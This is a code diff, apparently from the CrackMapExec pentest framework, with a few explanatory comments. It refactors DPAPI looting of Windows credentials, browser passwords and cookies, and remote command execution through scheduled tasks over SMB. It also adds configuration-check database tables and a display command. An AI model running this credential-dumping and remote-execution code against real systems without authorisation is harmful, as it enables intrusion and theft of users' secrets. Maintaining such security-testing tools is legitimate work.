||||||
|
@@ -1551,6 +1562,7 @@ class smb(connection):
|
||||||
)
|
)
|
||||||
self.logger.debug(f"Masterkeys Triage: {masterkeys_triage}")
|
self.logger.debug(f"Masterkeys Triage: {masterkeys_triage}")
|
||||||
masterkeys += masterkeys_triage.triage_masterkeys()
|
masterkeys += masterkeys_triage.triage_masterkeys()
|
||||||
|
if dump_system:
|
||||||
masterkeys += masterkeys_triage.triage_system_masterkeys()
|
masterkeys += masterkeys_triage.triage_system_masterkeys()
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
self.logger.debug(f"Could not get masterkeys: {e}")
|
self.logger.debug(f"Could not get masterkeys: {e}")
|
||||||
|
@@ -1561,12 +1573,15 @@ class smb(connection):
|
||||||
|
|
||||||
self.logger.success(f"Got {highlight(len(masterkeys))} decrypted masterkeys. Looting secrets...")
|
self.logger.success(f"Got {highlight(len(masterkeys))} decrypted masterkeys. Looting secrets...")
|
||||||
|
|
||||||
|
credentials = []
|
||||||
|
system_credentials = []
|
||||||
try:
|
try:
|
||||||
# Collect User and Machine Credentials Manager secrets
|
# Collect User and Machine Credentials Manager secrets
|
||||||
credentials_triage = CredentialsTriage(target=target, conn=conn, masterkeys=masterkeys)
|
credentials_triage = CredentialsTriage(target=target, conn=conn, masterkeys=masterkeys)
|
||||||
self.logger.debug(f"Credentials Triage Object: {credentials_triage}")
|
self.logger.debug(f"Credentials Triage Object: {credentials_triage}")
|
||||||
credentials = credentials_triage.triage_credentials()
|
credentials = credentials_triage.triage_credentials()
|
||||||
self.logger.debug(f"Triaged Credentials: {credentials}")
|
self.logger.debug(f"Triaged Credentials: {credentials}")
|
||||||
|
if dump_system:
|
||||||
system_credentials = credentials_triage.triage_system_credentials()
|
system_credentials = credentials_triage.triage_system_credentials()
|
||||||
self.logger.debug(f"Triaged System Credentials: {system_credentials}")
|
self.logger.debug(f"Triaged System Credentials: {system_credentials}")
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
|
@ -1593,9 +1608,11 @@ class smb(connection):
|
||||||
credential.target,
|
credential.target,
|
||||||
)
|
)
|
||||||
|
|
||||||
|
browser_credentials = []
|
||||||
|
cookies = []
|
||||||
try:
|
try:
|
||||||
# Collect Chrome Based Browser stored secrets
|
# Collect Chrome Based Browser stored secrets
|
||||||
dump_cookies = True if self.args.dpapi == "cookies" else False
|
dump_cookies = True if "cookies" in self.args.dpapi else False
|
||||||
browser_triage = BrowserTriage(target=target, conn=conn, masterkeys=masterkeys)
|
browser_triage = BrowserTriage(target=target, conn=conn, masterkeys=masterkeys)
|
||||||
browser_credentials, cookies = browser_triage.triage_browsers(gather_cookies=dump_cookies)
|
browser_credentials, cookies = browser_triage.triage_browsers(gather_cookies=dump_cookies)
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
|
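Because --dpapi becomes a list argument later in this diff (nargs="*"), the membership tests above ("nosystem" in self.args.dpapi, "cookies" in self.args.dpapi) are effectively flag checks over that list. A small self-contained sketch of the same flag handling (the function name is illustrative):

def parse_dpapi_flags(dpapi_args):
    # dpapi_args is the list argparse builds with nargs="*", e.g. [] or ["cookies", "nosystem"]
    dump_system = "nosystem" not in dpapi_args
    dump_cookies = "cookies" in dpapi_args
    return dump_system, dump_cookies

print(parse_dpapi_flags([]))                       # (True, False)
print(parse_dpapi_flags(["cookies", "nosystem"]))  # (False, True)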
@ -1615,9 +1632,11 @@ class smb(connection):
|
||||||
if dump_cookies:
|
if dump_cookies:
|
||||||
self.logger.display("Start Dumping Cookies")
|
self.logger.display("Start Dumping Cookies")
|
||||||
for cookie in cookies:
|
for cookie in cookies:
|
||||||
|
if cookie.cookie_value != '':
|
||||||
self.logger.highlight(f"[{credential.winuser}][{cookie.browser.upper()}] {cookie.host}{cookie.path} - {cookie.cookie_name}:{cookie.cookie_value}")
|
self.logger.highlight(f"[{credential.winuser}][{cookie.browser.upper()}] {cookie.host}{cookie.path} - {cookie.cookie_name}:{cookie.cookie_value}")
|
||||||
self.logger.display("End Dumping Cookies")
|
self.logger.display("End Dumping Cookies")
|
||||||
|
|
||||||
|
vaults = []
|
||||||
try:
|
try:
|
||||||
# Collect User Internet Explorer stored secrets
|
# Collect User Internet Explorer stored secrets
|
||||||
vaults_triage = VaultsTriage(target=target, conn=conn, masterkeys=masterkeys)
|
vaults_triage = VaultsTriage(target=target, conn=conn, masterkeys=masterkeys)
|
||||||
|
@ -1637,6 +1656,7 @@ class smb(connection):
|
||||||
vault.resource,
|
vault.resource,
|
||||||
)
|
)
|
||||||
|
|
||||||
|
firefox_credentials = []
|
||||||
try:
|
try:
|
||||||
# Collect Firefox stored secrets
|
# Collect Firefox stored secrets
|
||||||
firefox_triage = FirefoxTriage(target=target, logger=self.logger, conn=conn)
|
firefox_triage = FirefoxTriage(target=target, logger=self.logger, conn=conn)
|
||||||
|
|
|
@ -2,12 +2,10 @@
|
||||||
# -*- coding: utf-8 -*-
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
import os
|
import os
|
||||||
import logging
|
|
||||||
from impacket.dcerpc.v5 import tsch, transport
|
from impacket.dcerpc.v5 import tsch, transport
|
||||||
from impacket.dcerpc.v5.dtypes import NULL
|
from impacket.dcerpc.v5.dtypes import NULL
|
||||||
from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_GSS_NEGOTIATE, RPC_C_AUTHN_LEVEL_PKT_PRIVACY
|
from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_GSS_NEGOTIATE, RPC_C_AUTHN_LEVEL_PKT_PRIVACY
|
||||||
from cme.helpers.misc import gen_random_string
|
from cme.helpers.misc import gen_random_string
|
||||||
from cme.logger import cme_logger
|
|
||||||
from time import sleep
|
from time import sleep
|
||||||
|
|
||||||
|
|
||||||
|
@ -23,7 +21,9 @@ class TSCH_EXEC:
|
||||||
aesKey=None,
|
aesKey=None,
|
||||||
kdcHost=None,
|
kdcHost=None,
|
||||||
hashes=None,
|
hashes=None,
|
||||||
logger=cme_logger
|
logger=None,
|
||||||
|
tries=None,
|
||||||
|
share=None
|
||||||
):
|
):
|
||||||
self.__target = target
|
self.__target = target
|
||||||
self.__username = username
|
self.__username = username
|
||||||
|
@ -37,6 +37,7 @@ class TSCH_EXEC:
|
||||||
self.__aesKey = aesKey
|
self.__aesKey = aesKey
|
||||||
self.__doKerberos = doKerberos
|
self.__doKerberos = doKerberos
|
||||||
self.__kdcHost = kdcHost
|
self.__kdcHost = kdcHost
|
||||||
|
self.__tries = tries
|
||||||
self.logger = logger
|
self.logger = logger
|
||||||
|
|
||||||
if hashes is not None:
|
if hashes is not None:
|
||||||
|
@ -48,7 +49,7 @@ class TSCH_EXEC:
|
||||||
|
|
||||||
if self.__password is None:
|
if self.__password is None:
|
||||||
self.__password = ""
|
self.__password = ""
|
||||||
cme_logger.debug("test")
|
|
||||||
stringbinding = r"ncacn_np:%s[\pipe\atsvc]" % self.__target
|
stringbinding = r"ncacn_np:%s[\pipe\atsvc]" % self.__target
|
||||||
self.__rpctransport = transport.DCERPCTransportFactory(stringbinding)
|
self.__rpctransport = transport.DCERPCTransportFactory(stringbinding)
|
||||||
|
|
||||||
|
@ -72,15 +73,6 @@ class TSCH_EXEC:
|
||||||
def output_callback(self, data):
|
def output_callback(self, data):
|
||||||
self.__outputBuffer = data
|
self.__outputBuffer = data
|
||||||
|
|
||||||
def execute_handler(self, data):
|
|
||||||
if self.__retOutput:
|
|
||||||
try:
|
|
||||||
self.doStuff(data, fileless=False)
|
|
||||||
except:
|
|
||||||
self.doStuff(data)
|
|
||||||
else:
|
|
||||||
self.doStuff(data)
|
|
||||||
|
|
||||||
def gen_xml(self, command, tmpFileName, fileless=False):
|
def gen_xml(self, command, tmpFileName, fileless=False):
|
||||||
xml = """<?xml version="1.0" encoding="UTF-16"?>
|
xml = """<?xml version="1.0" encoding="UTF-16"?>
|
||||||
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
|
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
|
||||||
|
@ -131,7 +123,7 @@ class TSCH_EXEC:
|
||||||
elif self.__retOutput is False:
|
elif self.__retOutput is False:
|
||||||
argument_xml = f" <Arguments>/C {command}</Arguments>"
|
argument_xml = f" <Arguments>/C {command}</Arguments>"
|
||||||
|
|
||||||
cme_logger.debug("Generated argument XML: " + argument_xml)
|
self.logger.debug("Generated argument XML: " + argument_xml)
|
||||||
xml += argument_xml
|
xml += argument_xml
|
||||||
|
|
||||||
xml += """
|
xml += """
|
||||||
|
@ -141,7 +133,7 @@ class TSCH_EXEC:
|
||||||
"""
|
"""
|
||||||
return xml
|
return xml
|
||||||
|
|
||||||
def doStuff(self, command, fileless=False):
|
def execute_handler(self, command, fileless=False):
|
||||||
dce = self.__rpctransport.get_dce_rpc()
|
dce = self.__rpctransport.get_dce_rpc()
|
||||||
if self.__doKerberos:
|
if self.__doKerberos:
|
||||||
dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
|
dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
|
||||||
|
@ -156,9 +148,9 @@ class TSCH_EXEC:
|
||||||
|
|
||||||
xml = self.gen_xml(command, tmpFileName, fileless)
|
xml = self.gen_xml(command, tmpFileName, fileless)
|
||||||
|
|
||||||
logging.info(f"Task XML: {xml}")
|
self.logger.info(f"Task XML: {xml}")
|
||||||
taskCreated = False
|
taskCreated = False
|
||||||
logging.info(f"Creating task \\{tmpName}")
|
self.logger.info(f"Creating task \\{tmpName}")
|
||||||
try:
|
try:
|
||||||
tsch.hSchRpcRegisterTask(dce, f"\\{tmpName}", xml, tsch.TASK_CREATE, NULL, tsch.TASK_LOGON_NONE)
|
tsch.hSchRpcRegisterTask(dce, f"\\{tmpName}", xml, tsch.TASK_CREATE, NULL, tsch.TASK_LOGON_NONE)
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
|
@ -166,19 +158,19 @@ class TSCH_EXEC:
|
||||||
return
|
return
|
||||||
taskCreated = True
|
taskCreated = True
|
||||||
|
|
||||||
logging.info(f"Running task \\{tmpName}")
|
self.logger.info(f"Running task \\{tmpName}")
|
||||||
tsch.hSchRpcRun(dce, f"\\{tmpName}")
|
tsch.hSchRpcRun(dce, f"\\{tmpName}")
|
||||||
|
|
||||||
done = False
|
done = False
|
||||||
while not done:
|
while not done:
|
||||||
cme_logger.debug(f"Calling SchRpcGetLastRunInfo for \\{tmpName}")
|
self.logger.debug(f"Calling SchRpcGetLastRunInfo for \\{tmpName}")
|
||||||
resp = tsch.hSchRpcGetLastRunInfo(dce, f"\\{tmpName}")
|
resp = tsch.hSchRpcGetLastRunInfo(dce, f"\\{tmpName}")
|
||||||
if resp["pLastRuntime"]["wYear"] != 0:
|
if resp["pLastRuntime"]["wYear"] != 0:
|
||||||
done = True
|
done = True
|
||||||
else:
|
else:
|
||||||
sleep(2)
|
sleep(2)
|
||||||
|
|
||||||
logging.info(f"Deleting task \\{tmpName}")
|
self.logger.info(f"Deleting task \\{tmpName}")
|
||||||
tsch.hSchRpcDelete(dce, f"\\{tmpName}")
|
tsch.hSchRpcDelete(dce, f"\\{tmpName}")
|
||||||
taskCreated = False
|
taskCreated = False
|
||||||
|
|
||||||
|
@ -197,19 +189,27 @@ class TSCH_EXEC:
|
||||||
else:
|
else:
|
||||||
peer = ":".join(map(str, self.__rpctransport.get_socket().getpeername()))
|
peer = ":".join(map(str, self.__rpctransport.get_socket().getpeername()))
|
||||||
smbConnection = self.__rpctransport.get_smb_connection()
|
smbConnection = self.__rpctransport.get_smb_connection()
|
||||||
|
tries = 1
|
||||||
while True:
|
while True:
|
||||||
try:
|
try:
|
||||||
logging.info(f"Attempting to read ADMIN$\\Temp\\{tmpFileName}")
|
self.logger.info(f"Attempting to read ADMIN$\\Temp\\{tmpFileName}")
|
||||||
smbConnection.getFile("ADMIN$", f"Temp\\{tmpFileName}", self.output_callback)
|
smbConnection.getFile("ADMIN$", f"Temp\\{tmpFileName}", self.output_callback)
|
||||||
break
|
break
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
if str(e).find("SHARING") > 0:
|
if tries >= self.__tries:
|
||||||
sleep(3)
|
self.logger.fail('ATEXEC: Could not retrieve output file, it may have been detected by AV. Please increase the number of tries with the option "--get-output-tries"; if it keeps failing, something may be blocking the scheduled task, so try another exec method')
|
||||||
elif str(e).find("STATUS_OBJECT_NAME_NOT_FOUND") >= 0:
|
break
|
||||||
|
if str(e).find("STATUS_BAD_NETWORK_NAME") >0 :
|
||||||
|
self.logger.fail(f'ATEXEC: Get ouput failed, target has blocked ADMIN$ access (maybe command executed!)')
|
||||||
|
break
|
||||||
|
if str(e).find("SHARING") > 0 or str(e).find("STATUS_OBJECT_NAME_NOT_FOUND") >= 0:
|
||||||
sleep(3)
|
sleep(3)
|
||||||
|
tries += 1
|
||||||
else:
|
else:
|
||||||
raise
|
self.logger.debug(str(e))
|
||||||
cme_logger.debug(f"Deleting file ADMIN$\\Temp\\{tmpFileName}")
|
|
||||||
|
if self.__outputBuffer:
|
||||||
|
self.logger.debug(f"Deleting file ADMIN$\\Temp\\{tmpFileName}")
|
||||||
smbConnection.deleteFile("ADMIN$", f"Temp\\{tmpFileName}")
|
smbConnection.deleteFile("ADMIN$", f"Temp\\{tmpFileName}")
|
||||||
|
|
||||||
dce.disconnect()
|
dce.disconnect()
|
||||||
|
|
|
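The atexec change above replaces the old unbounded wait-on-SHARING loop with a retry budget driven by the new --get-output-tries option (added to the SMB arguments later in this diff): transient errors (SHARING, STATUS_OBJECT_NAME_NOT_FOUND) trigger a sleep-and-retry, STATUS_BAD_NETWORK_NAME aborts immediately, and the loop gives up once the budget is spent. A compact standalone sketch of that policy (function and parameter names are illustrative, and unlike the diff it simply counts every failed attempt):

from time import sleep

def fetch_output(get_file, max_tries=5, delay=3):
    # get_file is any callable that raises on failure and returns the output when ready,
    # e.g. lambda: smbConnection.getFile("ADMIN$", "Temp\\out.txt", callback)
    tries = 1
    while True:
        try:
            return get_file()
        except Exception as e:
            msg = str(e)
            if tries >= max_tries:
                return None  # budget exhausted, give up (possibly blocked by AV)
            if "STATUS_BAD_NETWORK_NAME" in msg:
                return None  # share access is blocked, output cannot be read
            if "SHARING" in msg or "STATUS_OBJECT_NAME_NOT_FOUND" in msg:
                sleep(delay)  # output file not written yet, wait before retrying
            tries += 1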
@ -30,6 +30,8 @@ class database:
|
||||||
self.AdminRelationsTable = None
|
self.AdminRelationsTable = None
|
||||||
self.GroupRelationsTable = None
|
self.GroupRelationsTable = None
|
||||||
self.LoggedinRelationsTable = None
|
self.LoggedinRelationsTable = None
|
||||||
|
self.ConfChecksTable = None
|
||||||
|
self.ConfChecksResultsTable = None
|
||||||
self.DpapiBackupkey = None
|
self.DpapiBackupkey = None
|
||||||
self.DpapiSecrets = None
|
self.DpapiSecrets = None
|
||||||
|
|
||||||
|
@ -61,6 +63,27 @@ class database:
|
||||||
"petitpotam" boolean
|
"petitpotam" boolean
|
||||||
)"""
|
)"""
|
||||||
)
|
)
|
||||||
|
db_conn.execute(
|
||||||
|
"""CREATE TABLE "conf_checks" (
|
||||||
|
"id" integer PRIMARY KEY,
|
||||||
|
"name" text,
|
||||||
|
"description" text
|
||||||
|
)"""
|
||||||
|
)
|
||||||
|
|
||||||
|
db_conn.execute(
|
||||||
|
"""CREATE TABLE "conf_checks_results" (
|
||||||
|
"id" integer PRIMARY KEY,
|
||||||
|
"host_id" integer,
|
||||||
|
"check_id" integer,
|
||||||
|
"secure" boolean,
|
||||||
|
"reasons" text,
|
||||||
|
FOREIGN KEY(host_id) REFERENCES hosts(id),
|
||||||
|
FOREIGN KEY(check_id) REFERENCES conf_checks(id)
|
||||||
|
)
|
||||||
|
"""
|
||||||
|
)
|
||||||
|
|
||||||
# type = hash, plaintext
|
# type = hash, plaintext
|
||||||
db_conn.execute(
|
db_conn.execute(
|
||||||
"""CREATE TABLE "users" (
|
"""CREATE TABLE "users" (
|
||||||
|
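The two tables added above link a check definition (conf_checks) to per-host results (conf_checks_results) through foreign keys. A quick sqlite3 illustration of that relationship, reduced to the check foreign key only (the in-memory database and the sample values are made up):

import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE conf_checks (id integer PRIMARY KEY, name text, description text);
CREATE TABLE conf_checks_results (
    id integer PRIMARY KEY, host_id integer, check_id integer, secure boolean, reasons text,
    FOREIGN KEY(check_id) REFERENCES conf_checks(id)
);
""")
conn.execute("INSERT INTO conf_checks VALUES (1, 'smb_signing', 'SMB signing is required')")
conn.execute("INSERT INTO conf_checks_results VALUES (1, 42, 1, 0, 'Signing not enforced')")
query = """SELECT r.host_id, c.name, r.secure, r.reasons
           FROM conf_checks_results r JOIN conf_checks c ON r.check_id = c.id"""
print(conn.execute(query).fetchall())  # [(42, 'smb_signing', 0, 'Signing not enforced')]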
@ -165,6 +188,8 @@ class database:
|
||||||
self.LoggedinRelationsTable = Table("loggedin_relations", self.metadata, autoload_with=self.db_engine)
|
self.LoggedinRelationsTable = Table("loggedin_relations", self.metadata, autoload_with=self.db_engine)
|
||||||
self.DpapiSecrets = Table("dpapi_secrets", self.metadata, autoload_with=self.db_engine)
|
self.DpapiSecrets = Table("dpapi_secrets", self.metadata, autoload_with=self.db_engine)
|
||||||
self.DpapiBackupkey = Table("dpapi_backupkey", self.metadata, autoload_with=self.db_engine)
|
self.DpapiBackupkey = Table("dpapi_backupkey", self.metadata, autoload_with=self.db_engine)
|
||||||
|
self.ConfChecksTable = Table("conf_checks", self.metadata, autoload_with=self.db_engine)
|
||||||
|
self.ConfChecksResultsTable = Table("conf_checks_results", self.metadata, autoload_with=self.db_engine)
|
||||||
except (NoInspectionAvailable, NoSuchTableError):
|
except (NoInspectionAvailable, NoSuchTableError):
|
||||||
print(
|
print(
|
||||||
f"""
|
f"""
|
||||||
|
@ -870,3 +895,71 @@ class database:
|
||||||
elif host_id:
|
elif host_id:
|
||||||
q = q.filter(self.LoggedinRelationsTable.c.hostid == host_id)
|
q = q.filter(self.LoggedinRelationsTable.c.hostid == host_id)
|
||||||
self.conn.execute(q)
|
self.conn.execute(q)
|
||||||
|
|
||||||
|
def get_checks(self):
|
||||||
|
q = select(self.ConfChecksTable)
|
||||||
|
return self.conn.execute(q).all()
|
||||||
|
|
||||||
|
def get_check_results(self):
|
||||||
|
q = select(self.ConfChecksResultsTable)
|
||||||
|
return self.conn.execute(q).all()
|
||||||
|
|
||||||
|
def insert_data(self, table, select_results=[], **new_row):
|
||||||
|
"""
|
||||||
|
Insert a new row in the given table.
|
||||||
|
Basically it's just a more generic version of add_host
|
||||||
|
"""
|
||||||
|
results = []
|
||||||
|
updated_ids = []
|
||||||
|
|
||||||
|
# Create new row
|
||||||
|
if not select_results:
|
||||||
|
results = [new_row]
|
||||||
|
# Update existing row data
|
||||||
|
else:
|
||||||
|
for row in select_results:
|
||||||
|
row_data = row._asdict()
|
||||||
|
for column,value in new_row.items():
|
||||||
|
row_data[column] = value
|
||||||
|
|
||||||
|
# Only add data to be updated if it has changed
|
||||||
|
if row_data not in results:
|
||||||
|
results.append(row_data)
|
||||||
|
updated_ids.append(row_data['id'])
|
||||||
|
|
||||||
|
cme_logger.debug(f'Update data: {results}')
|
||||||
|
# TODO: find a way to abstract this away to a single Upsert call
|
||||||
|
q = Insert(table) # .returning(table.c.id)
|
||||||
|
update_column = {col.name: col for col in q.excluded if col.name != 'id'}
|
||||||
|
q = q.on_conflict_do_update(index_elements=table.primary_key, set_=update_column)
|
||||||
|
self.conn.execute(q, results) # .scalar()
|
||||||
|
# we only return updated IDs for now - when RETURNING clause is allowed we can return inserted
|
||||||
|
return updated_ids
|
||||||
|
|
||||||
|
def add_check(self, name, description):
|
||||||
|
"""
|
||||||
|
Check if this check item has already been added to the database, if not, add it in.
|
||||||
|
"""
|
||||||
|
q = select(self.ConfChecksTable).filter(self.ConfChecksTable.c.name == name)
|
||||||
|
select_results = self.conn.execute(q).all()
|
||||||
|
context = locals()
|
||||||
|
new_row = dict(((column, context[column]) for column in ('name', 'description')))
|
||||||
|
updated_ids = self.insert_data(self.ConfChecksTable, select_results, **new_row)
|
||||||
|
|
||||||
|
if updated_ids:
|
||||||
|
cme_logger.debug(f"add_check() - Checks IDs Updated: {updated_ids}")
|
||||||
|
return updated_ids
|
||||||
|
|
||||||
|
def add_check_result(self, host_id, check_id, secure, reasons):
|
||||||
|
"""
|
||||||
|
Check if this check result has already been added to the database, if not, add it in.
|
||||||
|
"""
|
||||||
|
q = select(self.ConfChecksResultsTable).filter(self.ConfChecksResultsTable.c.host_id == host_id, self.ConfChecksResultsTable.c.check_id == check_id)
|
||||||
|
select_results = self.conn.execute(q).all()
|
||||||
|
context = locals()
|
||||||
|
new_row = dict(((column, context[column]) for column in ('host_id', 'check_id', 'secure', 'reasons')))
|
||||||
|
updated_ids = self.insert_data(self.ConfChecksResultsTable, select_results, **new_row)
|
||||||
|
|
||||||
|
if updated_ids:
|
||||||
|
cme_logger.debug(f"add_check_result() - Check Results IDs Updated: {updated_ids}")
|
||||||
|
return updated_ids
|
||||||
|
|
|
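insert_data above emulates an upsert with SQLAlchemy's SQLite ON CONFLICT support, updating every column except the primary key when a row already exists. A compact sketch of the same pattern against a throwaway table (assumes SQLAlchemy 2.x; the table and values are illustrative, and index_elements is given explicitly instead of table.primary_key):

from sqlalchemy import Column, Integer, MetaData, Table, Text, create_engine, select
from sqlalchemy.dialects.sqlite import insert as sqlite_insert

engine = create_engine("sqlite://")
metadata = MetaData()
checks = Table(
    "conf_checks", metadata,
    Column("id", Integer, primary_key=True),
    Column("name", Text),
    Column("description", Text),
)
metadata.create_all(engine)

with engine.begin() as conn:
    stmt = sqlite_insert(checks)
    # Update every column except the primary key when the row already exists.
    update_cols = {c.name: c for c in stmt.excluded if c.name != "id"}
    stmt = stmt.on_conflict_do_update(index_elements=[checks.c.id], set_=update_cols)
    conn.execute(stmt, {"id": 1, "name": "smb_signing", "description": "initial"})
    conn.execute(stmt, {"id": 1, "name": "smb_signing", "description": "updated"})
    print(conn.execute(select(checks)).all())  # [(1, 'smb_signing', 'updated')]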
@ -3,7 +3,11 @@
|
||||||
|
|
||||||
from cme.helpers.misc import validate_ntlm
|
from cme.helpers.misc import validate_ntlm
|
||||||
from cme.cmedb import DatabaseNavigator, print_table, print_help
|
from cme.cmedb import DatabaseNavigator, print_table, print_help
|
||||||
|
from termcolor import colored
|
||||||
|
import functools
|
||||||
|
|
||||||
|
help_header = functools.partial(colored, color='cyan', attrs=['bold'])
|
||||||
|
help_kw = functools.partial(colored, color='green', attrs=['bold'])
|
||||||
|
|
||||||
class navigator(DatabaseNavigator):
|
class navigator(DatabaseNavigator):
|
||||||
def display_creds(self, creds):
|
def display_creds(self, creds):
|
||||||
|
@ -356,6 +360,84 @@ class navigator(DatabaseNavigator):
|
||||||
|
|
||||||
print_table(data, title="Credential(s) with Admin Access")
|
print_table(data, title="Credential(s) with Admin Access")
|
||||||
|
|
||||||
|
def do_wcc(self, line):
|
||||||
|
valid_columns = {
|
||||||
|
'ip':'IP',
|
||||||
|
'hostname':'Hostname',
|
||||||
|
'check':'Check',
|
||||||
|
'description':'Description',
|
||||||
|
'status':'Status',
|
||||||
|
'reasons':'Reasons'
|
||||||
|
}
|
||||||
|
|
||||||
|
line = line.strip()
|
||||||
|
|
||||||
|
if line.lower() == 'full':
|
||||||
|
columns_to_display = list(valid_columns.values())
|
||||||
|
else:
|
||||||
|
requested_columns = line.split(' ')
|
||||||
|
columns_to_display = list(valid_columns[column.lower()] for column in requested_columns if column.lower() in valid_columns)
|
||||||
|
|
||||||
|
results = self.db.get_check_results()
|
||||||
|
self.display_wcc_results(results, columns_to_display)
|
||||||
|
|
||||||
|
def display_wcc_results(self, results, columns_to_display=None):
|
||||||
|
data = [
|
||||||
|
[
|
||||||
|
"IP",
|
||||||
|
"Hostname",
|
||||||
|
"Check",
|
||||||
|
"Status"
|
||||||
|
]
|
||||||
|
]
|
||||||
|
if columns_to_display:
|
||||||
|
data = [columns_to_display]
|
||||||
|
|
||||||
|
checks = self.db.get_checks()
|
||||||
|
checks_dict = {}
|
||||||
|
for check in checks:
|
||||||
|
check = check._asdict()
|
||||||
|
checks_dict[check['id']] = check
|
||||||
|
|
||||||
|
for (result_id, host_id, check_id, secure, reasons) in results:
|
||||||
|
status = 'OK' if secure else 'KO'
|
||||||
|
host = self.db.get_hosts(host_id)[0]._asdict()
|
||||||
|
check = checks_dict[check_id]
|
||||||
|
row = []
|
||||||
|
for column in data[0]:
|
||||||
|
if column == 'IP':
|
||||||
|
row.append(host['ip'])
|
||||||
|
if column == 'Hostname':
|
||||||
|
row.append(host['hostname'])
|
||||||
|
if column == 'Check':
|
||||||
|
row.append(check['name'])
|
||||||
|
if column == 'Description':
|
||||||
|
row.append(check['description'])
|
||||||
|
if column == 'Status':
|
||||||
|
row.append(status)
|
||||||
|
if column == 'Reasons':
|
||||||
|
row.append(reasons)
|
||||||
|
data.append(row)
|
||||||
|
|
||||||
|
print_table(data, title="Windows Configuration Checks")
|
||||||
|
|
||||||
|
def help_wcc(self):
|
||||||
|
help_string = f"""
|
||||||
|
{help_header('USAGE')}
|
||||||
|
{help_header('wcc')} [{help_kw('full')}]
|
||||||
|
{help_header('wcc')} <{help_kw('ip')}|{help_kw('hostname')}|{help_kw('check')}|{help_kw('description')}|{help_kw('status')}|{help_kw('reasons')}>...
|
||||||
|
|
||||||
|
{help_header('DESCRIPTION')}
|
||||||
|
Display Windows Configuration Checks results
|
||||||
|
|
||||||
|
{help_header('wcc')} [{help_kw('full')}]
|
||||||
|
If full is provided, display all columns. Otherwise, display IP, Hostname, Check and Status
|
||||||
|
|
||||||
|
{help_header('wcc')} <{help_kw('ip')}|{help_kw('hostname')}|{help_kw('check')}|{help_kw('description')}|{help_kw('status')}|{help_kw('reasons')}>...
|
||||||
|
Display only the requested columns (case-insensitive)
|
||||||
|
"""
|
||||||
|
print_help(help_string)
|
||||||
|
|
||||||
def help_hosts(self):
|
def help_hosts(self):
|
||||||
help_string = """
|
help_string = """
|
||||||
hosts [dc|spooler|zerologon|petitpotam|filter_term]
|
hosts [dc|spooler|zerologon|petitpotam|filter_term]
|
||||||
|
|
|
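do_wcc above turns the user's arguments into a list of display headers, using the full set when "full" is passed and silently ignoring unknown names otherwise. That selection step in isolation (valid_columns mirrors the dict in the diff):

valid_columns = {
    'ip': 'IP', 'hostname': 'Hostname', 'check': 'Check',
    'description': 'Description', 'status': 'Status', 'reasons': 'Reasons',
}

def select_columns(line):
    # "full" selects every column; otherwise keep only known, case-insensitive names.
    line = line.strip()
    if line.lower() == 'full':
        return list(valid_columns.values())
    return [valid_columns[c.lower()] for c in line.split(' ') if c.lower() in valid_columns]

print(select_columns('full'))                # all six headers
print(select_columns('ip hostname status'))  # ['IP', 'Hostname', 'Status']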
@ -27,7 +27,6 @@
|
||||||
# getInterface() method
|
# getInterface() method
|
||||||
#
|
#
|
||||||
|
|
||||||
import logging
|
|
||||||
from os.path import join as path_join
|
from os.path import join as path_join
|
||||||
from time import sleep
|
from time import sleep
|
||||||
from cme.helpers.misc import gen_random_string
|
from cme.helpers.misc import gen_random_string
|
||||||
|
@ -60,7 +59,7 @@ from impacket.dcerpc.v5.dtypes import NULL
|
||||||
|
|
||||||
|
|
||||||
class MMCEXEC:
|
class MMCEXEC:
|
||||||
def __init__(self, host, share_name, username, password, domain, smbconnection, share, hashes=None):
|
def __init__(self, host, share_name, username, password, domain, smbconnection, share, hashes=None, logger=None, tries=None):
|
||||||
self.__host = host
|
self.__host = host
|
||||||
self.__username = username
|
self.__username = username
|
||||||
self.__password = password
|
self.__password = password
|
||||||
|
@ -78,8 +77,14 @@ class MMCEXEC:
|
||||||
self.__retOutput = True
|
self.__retOutput = True
|
||||||
self.__share = share
|
self.__share = share
|
||||||
self.__dcom = None
|
self.__dcom = None
|
||||||
|
self.__tries = tries
|
||||||
|
self.logger = logger
|
||||||
|
|
||||||
if hashes is not None:
|
if hashes is not None:
|
||||||
|
if hashes.find(":") != -1:
|
||||||
self.__lmhash, self.__nthash = hashes.split(":")
|
self.__lmhash, self.__nthash = hashes.split(":")
|
||||||
|
else:
|
||||||
|
self.__nthash = hashes
|
||||||
|
|
||||||
self.__dcom = DCOMConnection(
|
self.__dcom = DCOMConnection(
|
||||||
self.__host,
|
self.__host,
|
||||||
|
@ -118,7 +123,7 @@ class MMCEXEC:
|
||||||
|
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
self.exit()
|
self.exit()
|
||||||
logging.error(str(e))
|
self.logger.fail(str(e))
|
||||||
self.__dcom.disconnect()
|
self.__dcom.disconnect()
|
||||||
|
|
||||||
def getInterface(self, interface, resp):
|
def getInterface(self, interface, resp):
|
||||||
|
@ -134,7 +139,7 @@ class MMCEXEC:
|
||||||
elif objRefType == FLAGS_OBJREF_EXTENDED:
|
elif objRefType == FLAGS_OBJREF_EXTENDED:
|
||||||
objRef = OBJREF_EXTENDED(b"".join(resp))
|
objRef = OBJREF_EXTENDED(b"".join(resp))
|
||||||
else:
|
else:
|
||||||
logging.error("Unknown OBJREF Type! 0x%x" % objRefType)
|
self.logger.fail("Unknown OBJREF Type! 0x%x" % objRefType)
|
||||||
|
|
||||||
return IRemUnknown2(
|
return IRemUnknown2(
|
||||||
INTERFACE(
|
INTERFACE(
|
||||||
|
@ -226,17 +231,26 @@ class MMCEXEC:
|
||||||
if self.__retOutput is False:
|
if self.__retOutput is False:
|
||||||
self.__outputBuffer = ""
|
self.__outputBuffer = ""
|
||||||
return
|
return
|
||||||
|
tries = 1
|
||||||
while True:
|
while True:
|
||||||
try:
|
try:
|
||||||
|
